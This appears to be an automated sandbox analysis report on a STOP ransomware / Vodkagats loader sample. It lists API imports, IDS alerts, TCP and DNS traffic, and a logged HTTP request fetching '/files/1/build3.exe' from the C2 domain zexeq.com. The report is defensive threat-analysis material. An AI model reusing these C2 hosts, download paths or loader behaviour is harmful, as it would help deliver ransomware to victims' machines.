                                                                                                KERNEL32.dllVirtualFree, WriteFile, GetDriveTypeA, OpenProcess, GlobalAlloc, GetSystemDirectoryW, WideCharToMultiByte, LoadLibraryW, Sleep, CopyFileW, FormatMessageW, lstrcpynW, CreateProcessA, TerminateProcess, ReadFile, CreateFileW, lstrcatA, GetEnvironmentVariableA, lstrcmpW, MultiByteToWideChar, lstrlenW, FlushFileBuffers, GetShortPathNameA, GetFileSizeEx, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, MoveFileW, FindClose, Process32FirstW, LocalAlloc, CreateEventW, GetModuleFileNameA, Process32NextW, lstrcatW, CreateMutexA, FindNextFileW, CreateToolhelp32Snapshot, SetEnvironmentVariableA, DeleteFileW, LocalFree, lstrcpyW, DeleteFileA, lstrcpyA, SetPriorityClass, GetCurrentProcess, GetComputerNameW, GetLogicalDrives, GetModuleFileNameW, SetStdHandle, GetVersion, CreateDirectoryA, CreateThread, CompareStringW, GetTimeFormatW, GetDateFormatW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetModuleHandleA, GetVersionExA, GlobalMemoryStatus, LoadLibraryA, FlushConsoleInputBuffer, WaitForSingleObject, CreateDirectoryW, SetFilePointerEx, CreateProcessW, FreeLibrary, SetErrorMode, lstrlenA, SetFilePointer, FindFirstFileW, SetConsoleMode, CreateFileA, GetCommandLineW, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetTimeZoneInformation, RaiseException, GetStringTypeW, GetConsoleCP, ReadConsoleW, GetConsoleMode, HeapSize, LoadLibraryExW, OutputDebugStringW, SetConsoleCtrlHandler, RtlUnwind, FatalAppExitA, GetStartupInfoW, GetExitCodeProcess, LCMapStringW, DeleteCriticalSection, AreFileApisANSI, ExitProcess, GetProcessHeap, HeapReAlloc, GlobalFree, SetEndOfFile, ReadConsoleInputA, CloseHandle, HeapFree, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, GetModuleHandleExW, WriteConsoleW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCurrentThread, GetCurrentThreadId
                                                                                                USER32.dllPeekMessageW, PostThreadMessageW, DefWindowProcW, DispatchMessageW, UpdateWindow, CreateWindowExW, LoadCursorW, IsWindow, ShowWindow, RegisterClassExW, PostQuitMessage, GetMessageW, DestroyWindow, SendMessageW, GetProcessWindowStation, GetUserObjectInformationW, MessageBoxA, GetDesktopWindow, MessageBoxW, TranslateMessage
                                                                                                ADVAPI32.dllRegCloseKey, CloseServiceHandle, GetUserNameW, ReportEventA, RegisterEventSourceA, DeregisterEventSource, CryptHashData, RegSetValueExW, CryptDestroyHash, ControlService, RegOpenKeyExW, CryptCreateHash, CryptEncrypt, CryptImportKey, QueryServiceStatus, RegQueryValueExW, CryptReleaseContext, OpenServiceW, OpenSCManagerW, CryptAcquireContextW, CryptGetHashParam
                                                                                                SHELL32.dllSHGetPathFromIDListW, SHGetSpecialFolderLocation, ShellExecuteA, ShellExecuteExW, CommandLineToArgvW, SHGetFolderPathA
                                                                                                ole32.dllCoInitialize, CoInitializeSecurity, CoUninitialize, CoCreateInstance
                                                                                                OLEAUT32.dllSysFreeString, VariantInit, VariantClear, GetErrorInfo, CreateErrorInfo, SetErrorInfo, VariantChangeType, SysAllocString
                                                                                                IPHLPAPI.DLLGetAdaptersInfo
                                                                                                WS2_32.dllinet_ntoa, inet_addr, gethostbyname
                                                                                                DNSAPI.dllDnsFree, DnsQuery_W
                                                                                                CRYPT32.dllCryptStringToBinaryA
                                                                                                GDI32.dllDeleteObject, GetObjectA, SelectObject, GetDeviceCaps, GetBitmapBits, BitBlt, DeleteDC, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                192.168.2.4199.59.242.15049734802833438 01/26/24-01:36:17.138983TCP2833438ETPRO TROJAN STOP Ransomware CnC Activity4973480192.168.2.4199.59.242.150
                                                                                                192.168.2.4199.59.242.15049732802020826 01/26/24-01:36:00.285049TCP2020826ET TROJAN Potential Dridex.Maldoc Minimal Executable Request4973280192.168.2.4199.59.242.150
                                                                                                192.168.2.4199.59.242.15049732802036333 01/26/24-01:36:00.285049TCP2036333ET TROJAN Win32/Vodkagats Loader Requesting Payload4973280192.168.2.4199.59.242.150
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 26, 2024 01:35:57.404159069 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.404258013 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:57.404366970 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.420011044 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.420042992 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:57.674853086 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:57.674935102 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.792140007 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.792196989 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:57.792592049 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:57.792783976 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.797086000 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:57.841903925 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:58.244445086 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:58.244519949 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:58.244662046 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.244662046 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.247033119 CET49729443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.247071981 CET44349729104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:58.933039904 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.933135986 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:58.933275938 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.944819927 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:58.944871902 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.191400051 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.191752911 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.196257114 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.196309090 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.196634054 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.196734905 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.198818922 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.245949984 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.772794008 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.772850037 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.772870064 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.772908926 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.772914886 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.772933006 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.772949934 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.772978067 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.773957968 CET49730443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:35:59.773978949 CET44349730104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.168560028 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.169039011 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.174576998 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.174623966 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.174679041 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.185698032 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.185715914 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.284696102 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.284907103 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.285048962 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.286668062 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.286739111 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.286905050 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.400397062 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.401484013 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.401551008 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.401662111 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.401667118 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.401825905 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.404849052 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.406033993 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.406092882 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.406115055 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.406128883 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.406146049 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.406164885 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:00.434072971 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.434149027 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.439203978 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.439222097 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.439590931 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.439657927 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.441596985 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:00.481942892 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.025734901 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.025796890 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:01.025816917 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.025830030 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.025881052 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:01.026787043 CET49733443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:01.026801109 CET44349733104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.135044098 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:01.250653982 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.250778913 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:01.251174927 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:01.366630077 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.367522001 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.367585897 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.367625952 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:01.367747068 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:01.367747068 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:05.450329065 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:05.569555998 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:05.569621086 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:05.569658995 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:05.569801092 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:05.569801092 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:05.569801092 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:06.388365984 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:06.504700899 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:06.504729033 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:06.504745960 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:06.504894018 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:06.504894018 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:06.504894018 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:07.322226048 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.322309017 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:07.322395086 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.361514091 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.361562014 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:07.613557100 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:07.613663912 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.618307114 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.618335962 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:07.618688107 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:07.618755102 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.620767117 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:07.665901899 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:08.191857100 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:08.192018986 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:08.192048073 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:08.192114115 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:08.192714930 CET49735443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:08.192753077 CET44349735104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:10.606481075 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:10.725145102 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:10.725246906 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:10.725286961 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:10.725281954 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:10.725359917 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:10.725359917 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:11.620079041 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:11.736500025 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:11.736566067 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:11.736607075 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:11.736651897 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:11.736651897 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:11.736651897 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:15.453862906 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.453901052 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.453963041 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.462065935 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.462084055 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.714107990 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.714189053 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.719170094 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.719178915 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.719417095 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.719883919 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.727262020 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:15.746963024 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:15.773935080 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.865904093 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.865948915 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.865986109 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:15.866023064 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:15.866090059 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:16.308037996 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:16.308095932 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:16.308106899 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:16.308257103 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:16.308325052 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:16.309153080 CET49736443192.168.2.4104.21.65.24
                                                                                                Jan 26, 2024 01:36:16.309166908 CET44349736104.21.65.24192.168.2.4
                                                                                                Jan 26, 2024 01:36:17.138983011 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:17.255230904 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:17.255290031 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:17.255307913 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:17.255330086 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:17.255343914 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:17.255374908 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:20.402007103 CET8049732199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:20.402093887 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:35.866493940 CET8049731199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:35.866640091 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:36:37.255822897 CET8049734199.59.242.150192.168.2.4
                                                                                                Jan 26, 2024 01:36:37.255888939 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:02.961420059 CET4973180192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:02.961441040 CET4973280192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:49.996665955 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:50.308145046 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:50.917515039 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:52.120737076 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:54.526993036 CET4973480192.168.2.4199.59.242.150
                                                                                                Jan 26, 2024 01:37:59.339410067 CET4973480192.168.2.4199.59.242.150
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 26, 2024 01:35:57.249713898 CET6029853192.168.2.41.1.1.1
                                                                                                Jan 26, 2024 01:35:57.371047974 CET53602981.1.1.1192.168.2.4
                                                                                                Jan 26, 2024 01:35:59.890434980 CET6437553192.168.2.41.1.1.1
                                                                                                Jan 26, 2024 01:35:59.894603014 CET6423953192.168.2.41.1.1.1
                                                                                                Jan 26, 2024 01:36:00.024852037 CET53643751.1.1.1192.168.2.4
                                                                                                Jan 26, 2024 01:36:00.167258024 CET53642391.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Jan 26, 2024 01:35:57.249713898 CET192.168.2.41.1.1.10xdeb0Standard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                Jan 26, 2024 01:35:59.890434980 CET192.168.2.41.1.1.10x7af4Standard query (0)colisumy.comA (IP address)IN (0x0001)false
                                                                                                Jan 26, 2024 01:35:59.894603014 CET192.168.2.41.1.1.10x659aStandard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Jan 26, 2024 01:35:57.371047974 CET1.1.1.1192.168.2.40xdeb0No error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                Jan 26, 2024 01:35:57.371047974 CET1.1.1.1192.168.2.40xdeb0No error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                Jan 26, 2024 01:36:00.024852037 CET1.1.1.1192.168.2.40x7af4Name error (3)colisumy.comnonenoneA (IP address)IN (0x0001)false
                                                                                                Jan 26, 2024 01:36:00.167258024 CET1.1.1.1192.168.2.40x659aNo error (0)zexeq.com199.59.242.150A (IP address)IN (0x0001)false
                                                                                                • api.2ip.ua
                                                                                                • zexeq.com
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449732199.59.242.150806376C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 26, 2024 01:36:00.285048962 CET94OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                User-Agent: Microsoft Internet Explorer
                                                                                                Host: zexeq.com
                                                                                                Jan 26, 2024 01:36:00.401484013 CET1286INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Fri, 26 Jan 2024 00:36:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Set-Cookie: parking_session=58750d2a-0222-8ca2-2f57-f0d9f084f2b1; expires=Fri, 26 Jan 2024 00:51:00 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg==
                                                                                                Cache-Control: no-cache
                                                                                                Accept-CH: sec-ch-prefers-color-scheme
                                                                                                Critical-CH: sec-ch-prefers-color-scheme
                                                                                                Vary: sec-ch-prefers-color-scheme
                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                Cache-Control: no-store, must-revalidate
                                                                                                Cache-Control: post-check=0, pre-check=0
                                                                                                Pragma: no-cache
                                                                                                Data Raw: 33 35 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 79 46 59 42 42 6c 4d 54 4b 2b 73 32 64 72 48 38 4d 2f 55 75 50 74 4f 77 67 43 30 51 35 49 2b 71 72 36 4f 30 39 31 6a 76 4e 52 4b 36 79 2b 47 61 42 36 5a 6a 49 71 68 52 71 7a 56 71 79 67 6c 6c 41 58 66 42 2f 6d 55 55 53 61 32 71 63 31 4a 2f 63 2f 47 6c 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                Data Ascii: 35b<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                Jan 26, 2024 01:36:00.401551008 CET401INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4e 54 67 33 4e 54 42 6b 4d 6d 45 74 4d 44 49 79 4d 69 30 34 59 32 45 79 4c 54 4a 6d 4e 54 63 74 5a 6a
                                                                                                Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiNTg3NTBkMmEtMDIyMi04Y2EyLTJmNTctZjBkOWYwODRmMmIxIiwicGFnZV90aW1lIjoxNzA2MjI5MzYwLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvZmlsZXNcLzFcL2J1aWxkMy5leGUiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWV
                                                                                                Jan 26, 2024 01:36:00.401662111 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449731199.59.242.150806376C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                TimestampBytes transferredDirectionData
